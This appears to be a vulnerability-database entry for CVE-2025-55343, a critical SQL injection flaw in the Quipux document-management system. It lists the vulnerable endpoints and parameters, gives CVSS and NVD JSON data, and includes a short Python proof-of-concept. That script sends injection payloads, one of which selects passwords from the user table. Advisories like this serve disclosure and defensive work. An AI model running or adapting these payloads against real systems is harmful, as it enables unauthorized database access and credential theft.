Security Vulnerability Report
中文
CVE-2025-55343 CVSS 9.9 CRITICAL

CVE-2025-55343

Published: 2025-11-05 19:16:01
Last Modified: 2026-01-09 18:52:41

Description

Quipux 4.0.1 through e1774ac allows authenticated users to conduct SQL injection attacks via busqueda/busqueda.php txt_depe_codi, busqueda/busqueda.php txt_usua_codi, anexos_lista.php radi_temp, Administracion/listas/formArea_ajax.php codDepe, Administracion/listas/formDepeHijo_ajax.php codDepe, Administracion/listas/formDepePadre_ajax.php codInst, asociar_documentos/asociar_borrar_referencia.php radi_nume, asociar_documentos/asociar_documento_buscar_query.php radi_nume, asociar_documentos/asociar_documento_grabar.php txt_radi_nume, asociar_documentos/asociar_documento radi_nume, radicacion/buscar_usuario.php buscar_tipo, radicacion/formArea_ajax.php codDepe, radicacion/formDepeHijo_ajax.php codDepe, radicacion/formDepePadre_ajax.php codInst, radicacion/ver_datos_usuario.php destinatorio, reportes/reporte_TraspasoDocFisico.php verrad, tx/datos_imprimir_sobre.php txt_usua_codi, tx/datos_imprimir_sobre.php nume_radi_temp, tx/revertir_firma_digital_grabar.php txt_radi_nume, tx/tx_borrar_opcion_imp.php codigo_opc, tx/tx_realizar_tx.php txt_radicados, tx/tx_seguridad_documentos.php txt_radicados, or uploadFiles/cargar_doc_digitalizado_paginador.php txt_depe_codi.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:quipux:quipux:4.0.1:*:*:*:*:*:*:* - VULNERABLE
Quipux < 4.0.1
Quipux 4.0.1 through e1774ac

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-55343 SQL Injection PoC for Quipux # Target: Quipux 4.0.1 through e1774ac TARGET_URL = "http://target-ip/quipux/" # SQL Injection payloads for different endpoints PAYLOADS = { "busqueda/busqueda.php": { "params": {"txt_depe_codi": "1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -", "txt_usua_codi": "1"}, "method": "GET" }, "asociar_documentos/asociar_documento_buscar_query.php": { "params": {"radi_nume": "' OR '1'='1"}, "method": "GET" }, "tx/tx_realizar_tx.php": { "params": {"txt_radicados": "' UNION SELECT password FROM usuario-- -"}, "method": "POST" } } def test_sqli(endpoint, params, method="GET"): """Test SQL injection vulnerability""" url = TARGET_URL + endpoint try: if method == "GET": response = requests.get(url, params=params, timeout=10) else: response = requests.post(url, data=params, timeout=10) # Check for SQL error indicators if any(err in response.text for err in ["mysql", "sql", "syntax", "error"]): return True, response.text[:500] except Exception as e: return False, str(e) return False, "" if __name__ == "__main__": print("[*] CVE-2025-55343 SQL Injection Test") print(f"[*] Target: {TARGET_URL}") for endpoint, config in PAYLOADS.items(): print(f"\n[*] Testing: {endpoint}") vulnerable, details = test_sqli(endpoint, config["params"], config["method"]) if vulnerable: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Details: {details}") else: print(f"[-] Not vulnerable or timeout")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55343", "sourceIdentifier": "[email protected]", "published": "2025-11-05T19:16:01.477", "lastModified": "2026-01-09T18:52:40.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quipux 4.0.1 through e1774ac allows authenticated users to conduct SQL injection attacks via busqueda/busqueda.php txt_depe_codi, busqueda/busqueda.php txt_usua_codi, anexos_lista.php radi_temp, Administracion/listas/formArea_ajax.php codDepe, Administracion/listas/formDepeHijo_ajax.php codDepe, Administracion/listas/formDepePadre_ajax.php codInst, asociar_documentos/asociar_borrar_referencia.php radi_nume, asociar_documentos/asociar_documento_buscar_query.php radi_nume, asociar_documentos/asociar_documento_grabar.php txt_radi_nume, asociar_documentos/asociar_documento radi_nume, radicacion/buscar_usuario.php buscar_tipo, radicacion/formArea_ajax.php codDepe, radicacion/formDepeHijo_ajax.php codDepe, radicacion/formDepePadre_ajax.php codInst, radicacion/ver_datos_usuario.php destinatorio, reportes/reporte_TraspasoDocFisico.php verrad, tx/datos_imprimir_sobre.php txt_usua_codi, tx/datos_imprimir_sobre.php nume_radi_temp, tx/revertir_firma_digital_grabar.php txt_radi_nume, tx/tx_borrar_opcion_imp.php codigo_opc, tx/tx_realizar_tx.php txt_radicados, tx/tx_seguridad_documentos.php txt_radicados, or uploadFiles/cargar_doc_digitalizado_paginador.php txt_depe_codi."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quipux:quipux:4.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "80D33D58-B0E7-4B58-B9C9-9881C65DA3FC"}]}]}], "references": [{"url": "https://minka.gob.ec/quipux-comunitario/quipux-comunitario", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://seguridaddigital.ec/research/20251101/report-20251101.en.pdf", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}